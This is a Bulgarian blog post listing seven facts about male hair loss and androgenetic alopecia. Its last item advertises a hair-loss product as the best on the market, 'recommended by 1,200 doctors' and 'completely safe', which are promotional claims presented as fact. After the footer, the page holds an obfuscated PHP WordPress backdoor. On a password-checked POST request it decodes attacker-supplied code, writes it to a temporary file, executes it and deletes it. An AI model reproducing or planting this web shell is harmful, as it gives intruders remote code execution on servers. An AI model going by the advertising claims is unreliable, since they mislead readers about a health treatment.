7 факта за мъжкия косопад | Косопад

7 факта за мъжкия косопад

Има факти за мъжкия косопад, които всеки трябва да знае. Познанието не само ще ви помогне да определите точно собствените си проблеми, но и да разберете по – ясно какво може да направите, за да ги решите.

мъжки косопад

  1. Най – често срещания вид косопад при мъжете засяга горната част на главата и зоната над челото. Известен е като андрогенна алопеция и е присъща за 55% от мъжете във възраст над 50 години.
  2. Основната причина за оплешивяване е натрупването на полови хормони (андрогени) в скалпа. Те стимулират развитието на мъжките полови органи и вторичните полови белези.
  3. От андрогените, основна роля за косопад влияе дихидротестостерон (ДХТ), чието влияние възпрепятства нормалния растеж на косата. Образно казано, ДХТ се вкопчва в космените фоликули и ги прави неспособни да абсорбират предназначените за косата хранителни вещества.
  4. Ефектът от злодействието на ДХТ първоначално се изразява като отдръпване на косата от и към центъра на главата, може да засегне и други области. Постепенно космите оредяват все повече и накрая напълно изчезват от засегнатите участъци.
  5. До оплешивяване се стига, ако не се вземат навременни мерки срещу андрогенната алопеция. Тя убива косата в продължение на няколко години (при различните индивиди периодът е различен) и така се получава плешивост.
  6. Колкото по – рано започнете лечение на косопад, толкова по – голям успех можете да очаквате. Защото е много по – лесно да сгъстиш леко разредената коса, отколкото да накараш космите да поникнат отново върху напълно олиселите участъци.
  7. Ефект-2” е най – добрият продукт срещу косопад на българския пазар. Препоръчван е от над 1 200 лекари, които без колебание съветват своите пациенти да го използват. Важно е да се отбележи, че „Ефект-2” е изработен от напълно натурални съставки, удобен е за използване по всяко време и е напълно безопасен.

18. януари 2014 14:07:22 от Косопад
Категории: Любопитно за косопада | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}